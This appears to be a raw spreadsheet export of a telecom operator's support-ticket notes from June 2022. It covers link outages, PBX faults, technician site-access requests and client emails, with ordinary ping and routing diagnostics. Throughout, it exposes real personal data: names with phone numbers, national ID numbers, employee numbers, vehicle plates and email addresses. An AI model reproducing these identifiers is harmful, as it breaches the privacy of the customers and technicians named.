GESTION DE ACCESOS F4613910|CC_TYT_GT_ATM2354 | 15 CALLE 0-95 ZONA 7, COLONIA TRIGALES, QUETZALTENANGO,CAJERO 2354
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;;FALLAS@5B.COM.GTY 2 MÁS
CC:CNOCCA;GRUPO N1
JUE 23/06/2022 12:49
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR APERTURA DE CAJERO A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4613910|CC_TYT_GT_ATM2354 | 15 CALLE 0-95 ZONA 7, COLONIA TRIGALES, QUETZALTENANGO,CAJERO 2354
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA DE ACUERDO A SU OPERACIÓN PARA PODER REALIZAR COORDINACIÓN
TÉCNICOS:
NOMBRE: CAYAX CHAVEZ, OSCAR EFRAIN	IBM: 537660	DPI: 2347762500901
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4613914</t>
  </si>
  <si>
    <t>LUEGO DEL REINICIO DE LA PBX CLIENTE CONTINÚA SIN RECIBIR LLAMADAS AL GDN, ÚNICAMENTE TIENE LLAMADAS SALIENTES. CLIENTE WILLIAM QUIJANO 76077295 SOLICITA QUE SE CERTIFIQUE MAÑANA A LAS 8 AM, NO ES NECESARIO TRAMITAR PERMISOS.</t>
  </si>
  <si>
    <t>CLIENTE FERNANDO AZUCENA 78591523 BRINDA NUEVO CONTACTO, JUAN JOSE MONTOYA 78533533, SOLICITA SE LE LLAME. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A JUAN JOSE MONTOYA 78533533 INDICA QUE NO ESTÁ EN EL SITIO, BRINDA CONTACTO DE WILLIAM QUIJANO 76077295</t>
  </si>
  <si>
    <t>CLIENTE WILLIAM QUIJANO 76077295 APOYA A UBICAR Y REINICIAR SU PLANTA PBX.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FERNANDO AZUCENA 78591523 INDICA QUE AÚN NO SE ENCUENTRA EN LAS INSTALACIONES, SOLICITA SE LLAME AL 78440841 QUIEN APOYARÁ A REALIZAR PRUEBAS CON LOS EQUIPOS. ID: 1001902365</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FERNANDO AZUCENA 78591523 COMENTA QUE SE ENCUENTRA ALMORZANDO, SOLICITA SE LE LLAME EN 1 HORA PARA REALIZAR PRUEBAS. INDICA QUE NO TIENE LLAMADAS EXTERNAS, SOLO INTERNAS.
1001868003
COLA:
NOMBRE: A: 0050378591523
NÚMERO: 0050378591523
DURACIÓN: 0:01:53
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050378591523
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 23/06/2022 12:12:23 P. M.</t>
  </si>
  <si>
    <t>F4613923</t>
  </si>
  <si>
    <t>-*- ESDRAS VASQUEZ 25069510 (CLIENTE) INFORMA QUE NO TIENE CONOCIMIENTO DEL CASO Y NO TIENEN REGISTRO DE LA INFORMACION COMPARTIDA,COMENTA QUE INDAGARA POR QUE PERSONA QUE REPORTO YA NO SE ENCUENTRA, SOLICITA SE LE LLAME EN 15 MINS -*
-*</t>
  </si>
  <si>
    <t>F4613925</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FABIO SOSA AL 51276289 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001901797
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO CAAL 56151460 MENCIONA QUE ESCALO EL CASO CON LA CENTRAL POR EL INCONVENIENTE DEL ANTIVIRUS PERO INDICA QUE AUN NO DECIDEN CUAL ADQUIRIR
CLIENTE SOLICITA AMABLEMENTE SE PUEDA DAR SEGUIMIENTO EL OTRO MARTES 5/07 A LAS 16:00 HRS
-ID 2001800258</t>
  </si>
  <si>
    <t>*/*/*/SE VERIFICA QUE EN CRONOLOGÍA DEL 24/06/2022 16:32:48 CLIENTE SOLICITÓ SEGUIMIENTO PARA EL 28/06/2022 16:11:05 CLIENTE SOLICITÓ SEGUIMIENTO PARA HOY 05/07/2022 YA QUE ESTAN VIENDO INTERNAMENTE CUÁL ANTIVIRUS ADQUIRIRÍAN PARA EVITAR BLOQUEO DE IP¿S, CLIENTE QUE LE ESTA DANDO SEGUIMIENTO ES SERGIO CAAL 56151460*/*//*/
///DEBIDO QUE ES UN TEMA INTERNO DEL CLIENTE Y NO PERTENECE A OPERACIONES EL TEMA DE SU ANTIVIRUS, SIN EMBARGO NO MENCIONAN  DESDE LA SOLICITUD DEL DESLIST 23/06/2022 SI ESTE YA SE REALIZÓ, CASO SIN SEGUIMIENTO, POR LO QUE SE PROCEDE A ESCALACIÓN:
--KEVYN FONSECA 41284612 ID: 3001915248 INDICA QUE ESCALARÁ CASO CON VICTORIA SISIMIT PARA VERIFICAR EL DESLIST
*/*/*/ SE PROCEDE A CAMBIO DE ESTADO */*/*/</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SERGIO CAAL 56151460  MENCIONA QUE YA TIENEN UNA PROPUESTA DE ANTIVIRUS, CLIENTE MENCIONA QUE POSIBLEMENTE ESTA SEMANA PUEDAN INSTALARLO Y ENVIAR LAS PRUEBAS QUE LE HABIAN SOLICITADO
CLIENTE MENCIONA QUE SI LOGRA TENER LAS PRUEBAS ANTES DEL MARTES SE ESTARA CONTACTANDO POR MEDIO DE CC
-ID 3001977307</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE   SERGIO CAAL 56151460 MENCIONA QUE AL LLEGAR A VERIFICAR LOS EQUIPOS EN PR PRESENTAN PROBLEMAS DE ANTIVIRUS POR LO QUE SOLICITA SE DE SEGUIMIENTO EL MARTES A LAS 16:00 HRS
SE LE SOLICITA A CLIENTE COMPARTIR LAS PRUEBAS PENDIENTES POR CORREO, SE LE BRINDAN LOS CORREOS DE N1 Y CNOCCA, ADICIONAL SE LE SOLICITA COLOCAR EN EL ASUNTO DEL CORREO EL NOMBRE DE LA EMPRESA, EL NUMERO DE ID Y EL TICKET
-ID 2001156907</t>
  </si>
  <si>
    <t>F4613940</t>
  </si>
  <si>
    <t>1/3	CARLOS MARADIAGA / ROBERTO AGUILERA	3390-7792/3190-4892
COMENTARIO INDICAN QUE ESTARAN REVISANDO CORREO ENVIADO.-</t>
  </si>
  <si>
    <t>F4613941</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO  A CLIENTE , SOLICITANDO LOS PERMISOS A CLIENTE PARA EL INGRESO DE LOS TÉCNICOS  // QUEDAMOS A LA ESPERA DE LA RESPUESTA
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 15:55
PARA: HSICAN@COPAAIR.COM &lt;HSICAN@COPAAIR.COM&gt;; HSICAN@COPAAIR.COM &lt;HSICAN@COPAAIR.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 351500001T | COMPAÑIA PANAMEÑA DE AVIACION
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN EL SITIO .
DIRECCIÓN:  INTERNET.- AEROPUERTO INTERNACIONAL LA AURORA EDIF. TERMINAL AEREA INTERNACIONAL FINGER NORTE PUERTO
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
NOMBRE IBM VEHICULO PLACA NO. ORDEN DPI PUESTO
PEDRO EDUARDO TOT MARTINEZ           739764 NISSAN SEDAN P-055GLD A-636 1681348100101                  TECNICO EN TRANSMISION 1
JUAN JOSE RODRIGUEZ PAZ                       217826 NISSAN MARCH P-740GTV A-698 2494432600208               TECNICO EN TRANSMISION 1
MARLON ENRIQUE MUÑOZ ORELLANA   652515 NISSAN MARCH P-173JFM A-864 1582465001801               TECNICO ESPECIALIZADO EN TRANSMISION
ERWIN EDUARDO DEL CID DUBON            52522 NISSAN MARCH P-049JNR A-850 1981487980101                 TECNICO ESPECIALIZADO EN TRANSMISION
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE CON LA FOTO DE LOS DPI DE LOS TECNICOS##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 15:43
PARA: HEIDI SICAN FARFAN (VENDOR) &lt;T-HSICAN@COPAAIR.COM&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; WENDY MARROQUIN COLINDRES (VENDOR) &lt;WMARROQUIN@COPAAIR.COM&gt;; JUAN RUIZ (CM) &lt;JARUIZ@COPAAIR.COM&gt;; JORGE CONTENTI &lt;JORGECONTENTI@YAHOO.COM&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | 351500001T | COMPAÑIA PANAMEÑA DE AVIACION
BUENAS TARDES ESTIMADOS.
ADJUNTO DOCUMENTOS DE LOS TÉCNICOS QUE ESTÁN LLEGANDO AL SITIO.
TECNICOS:
PEDRO EDUARDO TOT MARTINEZ           739764 NISSAN SEDAN P-055GLD A-636 1681348100101                  TECNICO EN TRANSMISION 1
JUAN JOSE RODRIGUEZ PAZ                       217826 NISSAN MARCH P-740GTV A-698 2494432600208               TECNICO EN TRANSMISION 1
MARLON ENRIQUE MUÑOZ ORELLANA   652515 NISSAN MARCH P-173JFM A-864 1582465001801               TECNICO ESPECIALIZADO EN TRANSMISION
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS</t>
  </si>
  <si>
    <t>F4613946</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23049696  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001581099</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A MELVIN CHACÓN/CLIENTE; SE LE INDICA QUE SE ESTÁN REALIZANDO PRUEBAS CON GESTIÓN N1/TÉCNICO, YA QUE SE VE INGRESO DE ERRORES EN EL SERVICIO. AVANCES EN UNOS 35/40 MINUTOS.</t>
  </si>
  <si>
    <t>F4613949</t>
  </si>
  <si>
    <t>F4613972</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE CAIDO,   SE CONSULTA A PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE LA AGE
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN ELEKTRADATOS 10.72.184.89
  PING 10.72.184.89: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.184.89 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.27
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.72.184.89
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.184.80/28  DIRECT  0    0             D   10.72.184.81    VLANIF339			</t>
  </si>
  <si>
    <t>F4613990</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 17:36
PARA: MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; FILIBERTO CACAO SAQUIC &lt;FILIBERTO.CACAOS@CLARO.COM.GT&gt;; CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; ANDREA URRUELA &lt;ANDREA.URRUELA@CLARO.COM.GT&gt;; ITSUPPORT@XENTURYGLOBAL.COM &lt;ITSUPPORT@XENTURYGLOBAL.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: XENTURY GLOBAL S.A.
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSCAR AJPOP AL 58009266 CLIENTE SOLICITA QUE SE LE LLAME EN 5 MIN**
-ID 1001886251
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSCAR AJPOP AL 58009266 INDCIA QUE SIGUE PRESENTANDO PROBLEMAS Y QUE ACABAN DE TENER UN APAGON SE REINICIARON LOS EQUIPOS PERO NO LEVANTA EL SERVICIO || SE NOTIFICA A GESTOR**
-ID 1001889386
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSCAR AJPOP AL 58009266 SE LE INDICA QUE SE LE ESTARA ENVIANDO CORREO CON PRUEBAS CL INDICA QUE ESTARA ESPERANDO EL CORREO Y NOS RESPONDERA **
-ID 1001897880
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSCAR AJPOP AL 58009266 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001010139
**</t>
  </si>
  <si>
    <t>F4613994</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
DESPUES DEL LOOP EL SERVICIO QUEDO ACTIVO Y SIN ERRORES.
CLIENTE VALIDA Y AUTORIZA EL CIERRE.</t>
  </si>
  <si>
    <t>F4613999</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARNOL CABALLERO SARMIENTO AL 3185-0297 NO RESPONDE || SE INTENTARA LUEGO**
-ID 1001909623
**</t>
  </si>
  <si>
    <t>F4614012</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DEL TECNICO MYNOR MORALES QUIEN SE LE APOYA CON VALIDAR EL ENLACE REDUNDANTE CON LO QUE EL ENALCE ESTA CAIDO, SE INDICA QUE NO SE TINENE NADA CONECTADO A LA PROST, SE CONECTA AL ROUTER Y SE TIENE RESPUESTA INESTABLE.
SE HACE CONFERENCIA CON WILLIAM DE SELECOM QUIEN NOS APOYA CON VALIDAR Y NOS INDICA QUE LA MODULACION NO SE PUEDE CAMBIAR YA QUE SOLO ES LA MEJOR QUE SE LOGRO OBTENER, POR LO QUE EL ENLACE QUEDA OPERATIVO PERO CON POCAS PERDIDAS.
2001488979
COLA: CNOCPROACTIVO
NOMBRE: DE: 58261476
NÚMERO: 58261476
DURACIÓN: 0:25:44
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58261476
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 27/06/2022 11:48:42</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS PARA LUNES A PARTIR DE LAS 8:00 HRS || PENDIENTE CONFIRMEN
ASUNTO: RE: SOLICITUD DE PERMISOS | 8902139T | MILVIA LOPEZ
ERITO FERNANDO TECU XITUMUL
BUENA NOCHE ESTIMADOS BANRURAL.
QUEDAMOS ATENTOS A SU RESPUESTA RESPECTO A LA SOLICITUD DE ACCESOS PARA EL PERSONAL TÉCNICO QUE ATENDERÁ VISITA EL DÍA DE MAÑANA EN TRANSCURSO DE LA MAÑANA.
ADJUNTO DATOS DEL PERSONAL ASIGNADO.
737074 MARIO OTONIEL TARACENA RIOS 1683479461301
710363 NOE MISAEL RIVAS RIVAS DPI: 2353403081301
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4614014</t>
  </si>
  <si>
    <t>SE LLAMO A ENCARGADO 4294-8198 CONTESTO SERGIO DE LEON, INFORMA QUE ELLOS SI TIENEN ENLACE, INFORMA QUE SE ENCUENTRA EN OAKLAND  MALL ID: 1001972249.</t>
  </si>
  <si>
    <t>F4614018</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 4294-7540 CONTESTA EL SEÑOR ALAN VELASQUEZ CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001902734
**</t>
  </si>
  <si>
    <t>F4614032</t>
  </si>
  <si>
    <t>CLIENTE MARLEN LOPEZ 58266937 ID: 1001888908 SOLICITA SE LE CAMBIE EL NOMBRE A LA EXTENSION SIGUIENTE:
EXTENSIÓN 11331 ASIGNAR EL NOMBRE DE JAIRO LÓPEZ
DIRECCIÓN: SEDE CENTRAL TSE 7 AVENIDA 0-23 Y 0-43 ZONA 2 GUATEMALA</t>
  </si>
  <si>
    <t>F4614033</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARCO OROZCO  25225562  83427441 , ENVIA A BUZON, || POR AHORA SIN RESPUESTA A CORREO SOLICITANDO VALIDAR SERVICIO
1001983234
COLA:
NOMBRE: A: 50683427441
NÚMERO: 50683427441
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50683427441
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 23/06/2022 19:57:57</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CONFIRMANDO EL FUNCIONAMIENTO DEL SERVICIO
DE: MARCO OROZCO GONZÁLEZ &lt;MOROZCO@ASECCSS.COM&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 20:58
PARA: ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: [EXTERNO] RE: TTK F4614033
BUENAS NOCHES,
ES CORRECTO, ACTUALMENTE VEO EL ENLACE NUEVAMENTE ACTIVO Y RESPONDE EL EQUIPO Y TENGO ADMINISTRACIÓN POR ESE MEDIO.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4614034</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERVION SANTOS 42340921 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001078386</t>
  </si>
  <si>
    <t>F4614035</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE AUTORIZA CIERRE Y SE LE RESPONDE*/*//*
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: JUEVES, 23 DE JUNIO DE 2022 16:51
PARA: 'WALTER ANIBAL REYES' &lt;WALTER.REYES@SOMOSCMI.COM&gt;; MIGUEL ANGEL DURAN CHICAS &lt;MIGUEL.DURAN@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: G310 - ENLACE CLARO - CON ID 770600218T
BUENAS TARDES WALTER,
            AGRADECEMOS POR SU AUTORIZACIÓN, HEMOS PROCEDIDO CON EL CIERRE DEL TICKET SD1138096.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
------------------------------------
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: JUEVES, 23 DE JUNIO DE 2022 16:48
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; MIGUEL ANGEL DURAN CHICAS &lt;MIGUEL.DURAN@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: G310 - ENLACE CLARO - CON ID 770600218T
BUENA TARDE, FAVOR PROCEDER A CERRAR TICKET, SERVICIO RESTABLECIDO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77927227 PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 1001919092</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE REPORTA QUE EL SERVICIO YA LEVANTÓ, DESEA QUE SE LE INDIQUE CUAL FUE EL MOTIVO DE LA AFECTACIÓN, SE LE INFORMA QUE CNOC RESPONDERÁ/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: JUEVES, 23 DE JUNIO DE 2022 15:32
PARA: 'WALTER ANIBAL REYES' &lt;WALTER.REYES@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: G310 - ENLACE CLARO - CON ID 770600218T
BUENAS TARDES WALTER,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
-------------------------
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: JUEVES, 23 DE JUNIO DE 2022 15:15
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: G310 - ENLACE CLARO - CON ID 770600218T
BUENA TARDE, EL ENLACE ESTA RESTABLECIDO, FAVOR COMPARTIR EL MOTIVO DE LA AFECCIÓN.
SALUDOS,</t>
  </si>
  <si>
    <t>F4614059</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. SR. VILLEDA 31808554 VALIDA ENLACE OPERATIVO Y ESTABLE, CLIENTE AUTORIZA CIERRE, ID: DISPOSITION: CALLED
CALL ID: 1001897798
ENLACE OPERATIVO CON CONEXION HACIA INTERNET:
&lt;1735691_AR617_HONDURAS-CARGO_COM04_DT12MB&gt;PING -A 192.168.60.1 8.8.8.8
  PING 8.8.8.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=1 TTL=114 TIME=49 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=2 TTL=114 TIME=49 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=3 TTL=114 TIME=49 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=4 TTL=114 TIME=49 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=5 TTL=114 TIME=49 MS
  --- 8.8.8.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 49/49/49 MS</t>
  </si>
  <si>
    <t>F4614072</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA CLIENTE LONDI MORATAYA PARA REPORTAR QUE SU SERVICIO VOLVIÓ A CAER A LAS 15:14HRS, ELLA ESTA SEGURA QUE NO SON SUS EQUIPOS Y DESEA QUE SE LE BRINDE LA ASISTENCIA, POR LO QUE SE PROCEDE A CONTACTAR A CNOC ID: 1001928063 NO RESPONDE, SE CITA POR SKYPE E INDICA QUE SE LE TRANSFIERA LLAMADA, ID: 1001929205, SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/</t>
  </si>
  <si>
    <t>F4614079</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE PIDE SE MANTENGA SERVICIO EN MONITOREO POR 24 HORAS, SE DEBE VALIDAR SERVICIO MAÑANA A LAS 14:45 HORAS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE LOPEZ   50636881 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001133053</t>
  </si>
  <si>
    <t>F4614080</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 16:03
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE GRANJERO 227_629100048T
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4614090</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE  KEREN SANDOVAL 59459804 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE LE MENCIONA QUE A NIVEL DE CLARO SE OBSERVA OPERATIVO Y ESTABLE
MENCIONA QUE NO CUENTAN CON MUCHA SEÑAL EN PR
-ID 2001141343</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 59459804 PARA SEGUIMIENTO, NO CONTESTA; SE CONSULTA A GESTIÓN N1 VÍA SKYPE CÓMO VEN COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>F4614118</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS  CHACÓN 33863426 MENCIONA QUE ESTA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS  8:00 HRS
-ID 1001958779</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS  CHACÓN 33863426 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001003472</t>
  </si>
  <si>
    <t>F4614123</t>
  </si>
  <si>
    <t>SE COLOCA EN ETAPA PENDIENTE  CLIENTE PARA ATENDER MAÑANA A HORARIO HABIL</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE VILLEDA 31808554 MENCIONA QUE YA APLICO REINICIOS A LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001915635
NOMBRE DEL CLIENTE: HONDURAS CARGO
UBICACIÓN:TEGUCIGALPA, BO. GUADALUPE, AVE. JASMIN 2 CUADRAS ABAJO DE POLLOS CARNESA, CONTINUO AL PUENTE
CONTACTO EN SITIO: JOSE VILLEDA 31808554
HORARIO DE ATENCION:HASTA LAS 20:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4614128</t>
  </si>
  <si>
    <t>EN TICKETS ANTERIORES SE ENCONTRO EL NUMERO DEL CLIENTE FRANSCICO PANAMEÑO, A QUIEN SE LE LLAMO PERO CORTA LA LLAMADA.
SE DARA SEGUIMIENTO EL DIA DE MAÑANA EN HORARIO HABIL.
1001970766
COLA:
NOMBRE: A: 0050360238756
NÚMERO: 0050360238756
DURACIÓN: 0:00:25
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050360238756
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
